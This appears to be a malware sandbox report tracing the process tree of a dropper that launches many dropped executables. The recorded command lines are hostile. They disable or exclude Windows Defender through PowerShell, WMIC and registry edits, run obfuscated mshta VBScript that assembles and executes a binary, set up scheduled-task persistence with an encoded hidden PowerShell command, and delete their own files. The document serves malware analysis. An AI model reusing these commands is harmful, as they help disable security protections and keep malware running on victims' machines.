PID 1924 wrote to memory of 1080	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1080	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1080	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1080	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1080	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 1080	1924	setup_install.exe	cmd.exe
PID 1924 wrote to memory of 920	1924	setup_install.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1124

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1116

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
PID:1572

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
PID:1636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri1034cd265b5e0adcd.exe
4⤵
- Loads dropped DLL
PID:1992

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1034cd265b5e0adcd.exe
Fri1034cd265b5e0adcd.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1956

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1034cd265b5e0adcd.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1034cd265b5e0adcd.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
6⤵
PID:1108

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1034cd265b5e0adcd.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1034cd265b5e0adcd.exe" ) do taskkill -F -Im "%~nXU"
7⤵
- Loads dropped DLL
PID:2080

C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2144

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
9⤵
PID:2224

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
10⤵
PID:2500

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
9⤵
PID:2824

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
10⤵
PID:2888

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
11⤵
PID:2956

C:\Windows\SysWOW64\control.exe
control .\FUEj5.QM
11⤵
PID:3008

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
12⤵
PID:2104

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
13⤵
PID:3368

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
14⤵
PID:3396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
11⤵
PID:2968

C:\Windows\SysWOW64\taskkill.exe
taskkill -F -Im "Fri1034cd265b5e0adcd.exe"
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2160

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri10584c049c7f.exe
4⤵
- Loads dropped DLL
PID:1344

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10584c049c7f.exe
Fri10584c049c7f.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1700

C:\Users\Admin\Documents\Lfs16AJQBT5ak_PmVsl9h1tr.exe
"C:\Users\Admin\Documents\Lfs16AJQBT5ak_PmVsl9h1tr.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2468

C:\Users\Admin\Documents\vSRpOLSbNRBbwtM7bgLJxpE0.exe
"C:\Users\Admin\Documents\vSRpOLSbNRBbwtM7bgLJxpE0.exe"
6⤵
- Executes dropped EXE
PID:2504

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\vSRpOLSbNRBbwtM7bgLJxpE0.exe"
7⤵
PID:4040

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
8⤵
- Delays execution with timeout.exe
PID:3088

C:\Users\Admin\Documents\f7GKXS2oAwqMu_TMdPaBiB6K.exe
"C:\Users\Admin\Documents\f7GKXS2oAwqMu_TMdPaBiB6K.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2544

C:\Users\Admin\Documents\i7fLMpX7oGXSbEkFfE5R182r.exe
"C:\Users\Admin\Documents\i7fLMpX7oGXSbEkFfE5R182r.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:1020

C:\Users\Admin\Documents\61ha1Q1X9MrKyWfoKBs9cbCy.exe
"C:\Users\Admin\Documents\61ha1Q1X9MrKyWfoKBs9cbCy.exe"
6⤵
- Executes dropped EXE
PID:992

C:\Users\Admin\Documents\YFlRUZXPU_LZvu6wZuScTno8.exe
"C:\Users\Admin\Documents\YFlRUZXPU_LZvu6wZuScTno8.exe"
6⤵
- Executes dropped EXE
PID:1540

C:\Users\Admin\Documents\Qjyc7EC86PyVdSLUUAM2kzDS.exe
"C:\Users\Admin\Documents\Qjyc7EC86PyVdSLUUAM2kzDS.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2260

C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe
"C:\Users\Admin\Documents\iAeXXqhQNJKur7teIlOrvF32.exe"
7⤵
- Executes dropped EXE
- Checks computer location settings
PID:1568

C:\Users\Admin\Documents\OoiihxGR6ud7fuP0h2pXZnq_.exe
"C:\Users\Admin\Documents\OoiihxGR6ud7fuP0h2pXZnq_.exe"
8⤵
- Executes dropped EXE
PID:2516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 612
8⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2256

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:3488

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:2036

C:\Users\Admin\Documents\y5ZV8LK3IHaS11HieAgnMl_s.exe
"C:\Users\Admin\Documents\y5ZV8LK3IHaS11HieAgnMl_s.exe"
6⤵
- Executes dropped EXE
PID:2072

C:\Users\Admin\Documents\B7rEf01TJHCnPi41f3gaGm1S.exe
"C:\Users\Admin\Documents\B7rEf01TJHCnPi41f3gaGm1S.exe"
6⤵
- Executes dropped EXE
PID:2756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 868
7⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:1688

C:\Users\Admin\Documents\gmJmpCzdJlKBZ6sE77joMVwc.exe
"C:\Users\Admin\Documents\gmJmpCzdJlKBZ6sE77joMVwc.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2696

C:\Users\Admin\Documents\D3Lx0aVCMLQsC133qZwP_h9Y.exe
"C:\Users\Admin\Documents\D3Lx0aVCMLQsC133qZwP_h9Y.exe"
6⤵
- Executes dropped EXE
PID:2228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 896
7⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2440

C:\Users\Admin\Documents\FZJ0uQGJzK34b6TeW89tx0YO.exe
"C:\Users\Admin\Documents\FZJ0uQGJzK34b6TeW89tx0YO.exe"
6⤵
- Executes dropped EXE
- Checks processor information in registry
PID:2704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Documents\FZJ0uQGJzK34b6TeW89tx0YO.exe" & exit
7⤵
PID:3572

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
8⤵
- Delays execution with timeout.exe
PID:3040

C:\Users\Admin\Documents\1HIx9q4ulVrMCsDQ7uJVGqa0.exe
"C:\Users\Admin\Documents\1HIx9q4ulVrMCsDQ7uJVGqa0.exe"
6⤵
- Executes dropped EXE
PID:2688

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "1HIx9q4ulVrMCsDQ7uJVGqa0.exe" /f & erase "C:\Users\Admin\Documents\1HIx9q4ulVrMCsDQ7uJVGqa0.exe" & exit
7⤵
PID:3184

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "1HIx9q4ulVrMCsDQ7uJVGqa0.exe" /f
8⤵
- Kills process with taskkill
PID:3288

C:\Users\Admin\Documents\t6qM3sYG6rSK3hAyx8CJMvkI.exe
"C:\Users\Admin\Documents\t6qM3sYG6rSK3hAyx8CJMvkI.exe"
6⤵
- Executes dropped EXE
PID:2668

C:\Users\Admin\Documents\JVeNuMZxbjp5KpNoHrbLFJl8.exe
"C:\Users\Admin\Documents\JVeNuMZxbjp5KpNoHrbLFJl8.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2308

C:\Program Files (x86)\Company\NewProduct\cm3.exe
"C:\Program Files (x86)\Company\NewProduct\cm3.exe"
7⤵
- Executes dropped EXE
PID:920

C:\Program Files (x86)\Company\NewProduct\inst002.exe
"C:\Program Files (x86)\Company\NewProduct\inst002.exe"
7⤵
- Executes dropped EXE
PID:2352

C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
7⤵
- Executes dropped EXE
PID:2204

C:\Users\Admin\Documents\9F4Xktpzp1wzfwZd5KZ8KO98.exe
"C:\Users\Admin\Documents\9F4Xktpzp1wzfwZd5KZ8KO98.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:2488

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
7⤵
PID:3812

C:\Users\Admin\Documents\5Ht4JL0tbOHEn4OZeeUiT1uC.exe
"C:\Users\Admin\Documents\5Ht4JL0tbOHEn4OZeeUiT1uC.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2672

C:\Users\Admin\Documents\8Y2btnvkYZZYOVAmRmBwuiFZ.exe
"C:\Users\Admin\Documents\8Y2btnvkYZZYOVAmRmBwuiFZ.exe"
6⤵
- Executes dropped EXE
PID:2304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 268
7⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2884

C:\Users\Admin\Documents\WExDcTZQShsl7u0bAnfC9oJQ.exe
"C:\Users\Admin\Documents\WExDcTZQShsl7u0bAnfC9oJQ.exe"
6⤵
- Executes dropped EXE
PID:2780

C:\Users\Admin\AppData\Local\Temp\7zSE57E.tmp\Install.exe
.\Install.exe
7⤵
- Executes dropped EXE
PID:240

C:\Users\Admin\AppData\Local\Temp\7zS2BC0.tmp\Install.exe
.\Install.exe /S /site_id "394347"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:3168

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
9⤵
PID:3220

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
10⤵
PID:3356

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
11⤵
PID:3376

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
12⤵
- Drops file in System32 directory
PID:3388

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
13⤵
PID:3228

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
10⤵
PID:3548

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
11⤵
PID:2772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
12⤵
- Drops file in System32 directory
PID:3820

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
13⤵
PID:1252

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
10⤵
PID:2120

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
11⤵
PID:2184

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
12⤵
- Drops file in System32 directory
PID:2140

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
13⤵
PID:3436

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
10⤵
PID:3576

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
11⤵
PID:3376

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
12⤵
- Drops file in System32 directory
PID:2816

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
13⤵
PID:3656

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
9⤵
PID:3564

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
10⤵
PID:3636

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
11⤵
PID:3672

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
11⤵
PID:3788

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
9⤵
PID:3588

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
10⤵
PID:3660

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
11⤵
PID:3760

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
11⤵
PID:3796

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gfKTxbyvD" /SC once /ST 06:46:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
9⤵
- Creates scheduled task(s)
PID:3820

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gfKTxbyvD"
9⤵
PID:4052

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gfKTxbyvD"
9⤵
PID:2200

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 16:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\eQDfNpy.exe\" uG /site_id 394347 /S" /V1 /F
9⤵
- Creates scheduled task(s)
PID:3404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 2524
6⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:2284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri10b0a06a73706.exe
4⤵
- Loads dropped DLL
PID:1436

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10b0a06a73706.exe
Fri10b0a06a73706.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri1015b9a4e0b.exe
4⤵
- Loads dropped DLL
PID:608

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1015b9a4e0b.exe
Fri1015b9a4e0b.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri106e757f6d75.exe
4⤵
- Loads dropped DLL
PID:1260

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri106e757f6d75.exe
Fri106e757f6d75.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1020

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri106e757f6d75.exe
C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri106e757f6d75.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri1008c7d6874.exe
4⤵
- Loads dropped DLL
PID:1080

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri1008c7d6874.exe
Fri1008c7d6874.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1368

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri103a7805577.exe
4⤵
- Loads dropped DLL
PID:920

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri103a7805577.exe
Fri103a7805577.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
- Executes dropped EXE
PID:3052

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
7⤵
PID:2500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri1018ef4aa251c026c.exe
4⤵
PID:1860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri10d184202996a0d7f.exe
4⤵
- Loads dropped DLL
PID:1656

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10d184202996a0d7f.exe
Fri10d184202996a0d7f.exe
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri10720d229511df563.exe
4⤵
- Loads dropped DLL
PID:1632

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10720d229511df563.exe
Fri10720d229511df563.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 640
6⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2652

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:2644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri105268dda3.exe
4⤵
PID:1852

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri105268dda3.exe
Fri105268dda3.exe
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2424

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri10fcc13ae0125c8.exe
4⤵
- Loads dropped DLL
PID:1688

C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10fcc13ae0125c8.exe
Fri10fcc13ae0125c8.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1932

C:\Users\Admin\AppData\Local\Temp\is-F4GDI.tmp\Fri10fcc13ae0125c8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F4GDI.tmp\Fri10fcc13ae0125c8.tmp" /SL5="$50134,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zSC54FE7C2\Fri10fcc13ae0125c8.exe"
6⤵
- Executes dropped EXE
